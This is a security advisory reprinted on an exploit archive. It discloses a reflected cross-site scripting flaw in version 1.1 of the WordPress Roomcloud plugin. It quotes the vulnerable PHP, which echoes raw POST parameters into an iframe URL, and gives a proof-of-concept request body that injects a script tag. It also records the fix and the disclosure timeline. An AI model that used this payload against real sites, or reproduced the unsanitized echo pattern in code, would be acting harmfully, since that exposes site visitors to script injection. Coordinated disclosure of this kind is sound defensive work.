what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

WordPress Roomcloud 1.1 Cross Site Scripting

WordPress Roomcloud 1.1 Cross Site Scripting
Posted May 11, 2015
Authored by Nitin Venkatesh

WordPress Roomcloud plugin version 1.1 suffers from a cross site scripting vulnerability.

tags | exploit, xss
SHA-256 | aa6f1baa084cf9ef2f9f490eca9a17fc9a3a2e9cc0ee9c57b7313b5821b6ad0d

WordPress Roomcloud 1.1 Cross Site Scripting

Change Mirror Download
## Details

# Title: Unsanitized parameters in Wordpress Roomcloud plugin v1.1(rev
@1115307) allows Cross-site Scripting
# Submitter: Nitin Venkatesh <venkatesh [dot] nitin [at] gmail [dot] com>
# Product: Wordpress Roomcloud plugin
# Product URL: https://wordpress.org/plugins/roomcloud
# Vulnerability Type: Cross-site Scripting [CWE-79]
# Affected Versions: Tested on v1.1 (revision @1115307)
# Fixed Version: v1.1 (revision @1117499)
# Link to source code diff:
https://plugins.trac.wordpress.org/changeset/1117499
# CVE Status: None/Unassigned/Fresh

## Product Information

A Plugin to add roomcloud booking form to hotel website using [roomcloud]
shortcode

Use Roomcloud plugin to embed our Booking Engine form into your wordpress
site.
This allows your customers to make online reservations on the web site of
your hotel.
More info at http://www.roomcloud.net

## Vulnerability Description

Unsantized POST parameters are susceptible to XSS in the roomcloud.php file
viz., (1)pin, (2)start_day, (3)start_month, (4)start_year, (5)end_day,
(6)end_month, (7)end_year, (8)lang, (9)adults, (10)children

## Vulnerable Source Code

39 echo('<iframe width="800" height="600" src="');
40
41 echo('
http://www.roomcloud.net/be/se1/hotel.jsp?hotel='.$_POST['hotel'].'&pin='.$_POST['pin'].'&start_day='.$_POST['start_day'].'&start_month='.$_POST['start_month'].'&start_year='.$_POST['start_year'].'&end_day='.$_POST['end_day'].'&end_month='.$_POST['end_month'].'&end_year='.$_POST['end_year'].'&r=1&a=1&lang='.$_POST['lang'].'&t=0&n=0&adults='.$_POST['adults'].'&children='.$_POST['children'].$chlda
);
42
43 echo('"></iframe>');

## Proof of Concept

Sample exploit POST request body:

hotel=144&lang=en&start_day="><script>alert(1);</script>&start_month=03&start_year=2015&end_day=20&end_month=03&end_year=2015&adults=2&pin=&children=

## Solution:

Upgrade to latest version of the plugin.

## Disclosure Timeline:

2015-03-19 - Informed developer in support forums for the plugin & mailed
Wordpress plugins team
2015-03-21 - Plugin disabled for download by Wordpress team
2015-03-21 - Contacted developer via email
2015-03-21 - Vulnerability fixed by developer
2015-03-22 - Agreed to public disclosure on/after May 5, 2015
2015-03-23 - Wordpress Plugins team re-enables download page
2015-05-09 - Publishing disclosure on FD mailing list.

## Disclaimer:

This disclosure is purely meant for educational purposes. I will in no way
be responsible as to how the information in this disclosure is used.


Login or Register to add favorites

File Archive:

July 2022

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Jul 1st
    52 Files
  • 2
    Jul 2nd
    0 Files
  • 3
    Jul 3rd
    0 Files
  • 4
    Jul 4th
    11 Files
  • 5
    Jul 5th
    0 Files
  • 6
    Jul 6th
    0 Files
  • 7
    Jul 7th
    0 Files
  • 8
    Jul 8th
    0 Files
  • 9
    Jul 9th
    0 Files
  • 10
    Jul 10th
    0 Files
  • 11
    Jul 11th
    0 Files
  • 12
    Jul 12th
    0 Files
  • 13
    Jul 13th
    0 Files
  • 14
    Jul 14th
    0 Files
  • 15
    Jul 15th
    0 Files
  • 16
    Jul 16th
    0 Files
  • 17
    Jul 17th
    0 Files
  • 18
    Jul 18th
    0 Files
  • 19
    Jul 19th
    0 Files
  • 20
    Jul 20th
    0 Files
  • 21
    Jul 21st
    0 Files
  • 22
    Jul 22nd
    0 Files
  • 23
    Jul 23rd
    0 Files
  • 24
    Jul 24th
    0 Files
  • 25
    Jul 25th
    0 Files
  • 26
    Jul 26th
    0 Files
  • 27
    Jul 27th
    0 Files
  • 28
    Jul 28th
    0 Files
  • 29
    Jul 29th
    0 Files
  • 30
    Jul 30th
    0 Files
  • 31
    Jul 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Hosting By
Rokasec
close